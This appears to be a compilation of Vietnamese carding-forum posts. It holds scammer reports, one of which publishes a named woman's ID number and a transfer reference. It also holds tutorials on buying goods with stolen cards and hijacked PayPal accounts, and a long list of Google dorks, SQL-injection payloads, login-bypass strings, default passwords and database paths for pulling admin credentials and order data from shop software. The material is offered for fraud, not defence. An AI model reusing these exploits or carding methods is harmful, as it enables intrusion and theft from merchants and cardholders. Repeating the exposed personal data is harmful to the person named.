Scammer " Anh Em Cần Chú Ý" Update

nick yahoo: shine.shipper 

***************************************************

Đã từng tuyển drop trong forum lúc mới vừa mở....
yahoo nó đây : vannessa_thao và nick yahoo mới là dropper_manager
scam mình 1 ipad mini tuy có 2 chai mấy nhưng repport để anh em cẩn thận

******************************************************

Thằng bạn em bị thằng tên là tèo trên diễn đàn vnsw yahoo la: smile.outside

Nó giả vờ track rùi bảo drop pay tiền trước 50% = 100lr 


Nó lấy tài khoản của người khác: Trần Thi Phuong Dung
Số chứng minh thư : 225534529 ngày cấp 17/4/2010
nơi cấp Khánh Hòa

lệnh giao dich chuyển tiền thành công : 0512120084501001

****************************************************

thật ra thì chả có j chơi nên rp cho vui 
cho a e bik mà tránh 
đây là ym của dog: vhb.anonymous
còn đây là lr account: U8848906 (Tommie), sau khi cam thì nó đổi name thành U8848906 (Noname) 

***************************************

Kinh nghiệm chơi shopify ship về VN

Chắc lâu lắm rồi anh em không thấy tut xuất hiện, tại vì mình share rồi, đi xin lại chả ai cho lại . Buồn quá 


Đi thẳng vào vấn đề, dạo này cái mỏ vằng shopify càng ngày càng khó nhai, đa số newbie toàn muốn ship về vn vậy làm sao mình có thể tìm đựoc site ship vè vn
Hôm nay mình sẽ giúp newbie một ít kinh nghiệm search shop, Site thì mình không có share nhé, đa số site shopify ăn đựoc 3-5 là bị error gate ngay phát nản luôn
Mấy bạn newbie muốn search thì phải làm sao nhỉ, tất cả site gate shopify đa số share trên các diễn đàn mình không bao h ship cả, nhưng vẫn thích view tut để xem trong đó có j nào
Vì sao mình cân view product, vì search product nó mới ra site mình cần tìm mấy bác ak 

Có tên sản phẩm cần search bắt đầu bỏ vào http://marketplace.shopify.com/
Hoặc anh em search dork : inurl:"myshopify.com" ra cả đống nhé
Khi nhìn bạn thấy cái này trong phần shipping address

Khi nhìn bạn thấy cái này trong phần shipping address

Thì bạn nên bỏ site đó đi, vì đó chứng nhận nó đá nát hay gate nó check fraut


-Đối anh em muốn chơi site có đồ nhiều:
+Mọi người nên check ccv đảm bảo đủ balance có một số ccv nó delay by authorization bank mình thấy bin này 401398|CREDIT - PLATINUM|U.S. BANK N.A. ND|UNITED STATES|N/A bị đây, không biết phải ccv hết tiền không
+ Reg cái mail yahoo, trùng tên ccname, chú ý khi reg dùng sock mả reg mail nhé
+Những cái site mà pay 2 phát không qua, hay nó báo error by transaction kòn nữa mình không nhớ
+Shopify thì anh em nên chơi nhầm nước đi


-Đối anh em muốn chơi site có đồ ít:
+Ship qua gate là ok, ngồi hóng track nếu lâu quá mail shop bảo: I have order in your site, but now I doing not see that The status of my order to changed""


Ngoài shopify chúng ta có thể biến hóa nhìu dork khác, nếu ta phát hiện site đó check out bằng gate j nhé
chẳng hạn gate ips.com thì mấy bác tự hỉu nhé 
Dạo này đi xin site ship mà toàn shopify phát nản, chả mần j được

Lưu ý anh em kiếm được site shopify thì 1 tuần làm 1 order thui nhé, Pay sao dưới 100$ là free tax kinh nghiệm thế thôi .

Ps: Mình cũng mới vừa nhận 2 cái áo sáng này..tổng tiền đơn hàng + tax vừa tròn 1 con số 99.98$ nên không dính tax.

Nguồn : Leech from vnsw

Các Thủ thuật hack cc mới cho ae

Most of these are outdated but they can still work if you happen to find a vulnerable site:



1:
google dork :--> inurl:"/cart.php?m="
target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or"="
Password : 'or"=

2:
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb


3:
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.co....dd=action&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.....late=order.log


4:
google dork :--> allinurl: Lobby.asp
target looks like :--> www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb


5:
google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6


login page: http://xxxxxxx/vpasp/shopadmin.asp


6:
google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'--
%20'b%25'--
%20'c%25'--
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp


7:
google dork :--> allinurl:/shopadmin.asp
target looks like :--> www.xxxxxx.com/shopadmin.asp
exploit:
user : 'or'1
pass : 'or'1

8:
google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.co....short_blue.htm
exploit :--> ../admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.c....iles/order.log

9:
google.com:--> allinurl:/metacart/
target looks like :--> www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb

10:
google.com:--> allinurl:/DCShop/
target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt


11:
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.


12:
google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log

13:
google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
after dl the db look at access for user and password


14:
1/ search google: allinurl:"shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5


2/ find error by adding '
--->http://victim.com/shopdisplayproducts.asp?id=5'


--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467


-If you don't see error then change id to cat


--->http://victim.com/shopdisplayproducts.asp?cat=5'


3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password


--->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password


--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......


4/ add 2,3,4,5,6.......until you see a nice table


add 2
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password


...5,6,7,8,9.... untill you see a table. (exp:...47)


---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.




5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password


--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password


6/ Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp




Didn't work? then u have to find yourself:


add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password


--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password




you'll see something like: ( lot of them)


shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............


then guess admin link by adding the above data untill you find admin links

15:
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx


the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb


download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com


inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.


the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp


if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are


Username: admin
password: admin
OR
Username: vpasp
password: vpasp

Nguồn : Kunga

Pay bằng paypal như thế nào?

Pay bằng CCV và CCN thì hầu hết các bạn đều đã biết cả rồi,còn một số bạn nữa chưa biết,hoặc là pay không thành công,bị SM hoặc Limit. Mình xin phép có 1 số lưu ý khi các bạn muốn pay bằng paypal
Các bạn đã biết paypal có độ bảo mật khá cao nên dùng khá khó khăn,đặc biệt là khó qua khi pay với mức giá cao. Cho nên mình xin lưu ý các bạn không nên pay quá 200$ vì khả năng thành công ít thôi
Lưu ý 2: dùng một con sock trùng state với info, không blacklist-Cái này các bạn chắc là biết rồi
Lưu ý 3: Check xem chủ pp có thường xuyên login vào acc không,nó kiểm tra mà IP khác đăng nhập là biết ngay
Lưu ý 4: Nhớ kĩ pay xong là vào acc paypal cho history vừa pay vào achieve,để khỏi bị refund
Lưu ý 5: cứ vào shop mà mua thôi,info dùng của chủ acc cho chắc
đối với các mặt hàng ship thì các bạn có thể dùng info ship của mình,hoặc là dùng của chủ acc rồi change lại sau,Có thể PM trực tiếp cho shop
Nếu chỉ pay bình thường thì cơ bản chỉ có như vậy thôi.Chỉ có mấy lưu ý để các bạn thành công Không có gì gọi là TUT cả,ai thấy bổ ích thì thank mình cái

Nguồn : leech from vhuteam

TUT Ship CCV Áo thun nam nữ

Site này ped cũng lâu nhưng còn ăn dc nên share cho ae …
Nguyên liệu: CCV
Sock trùng Courtry khỏi cần trùng state
Mail nào cung dược bill # ship
Dr luôn cho máu … Khỏi nhầm hàng lâu về
Track LN là biết free tax rồi

Hidden Block (0 post(s) are required, you have 0): http://hegreaterthani.com/ =>> gate shopify

Thanked for pri !

_________________ Nguồn : Leech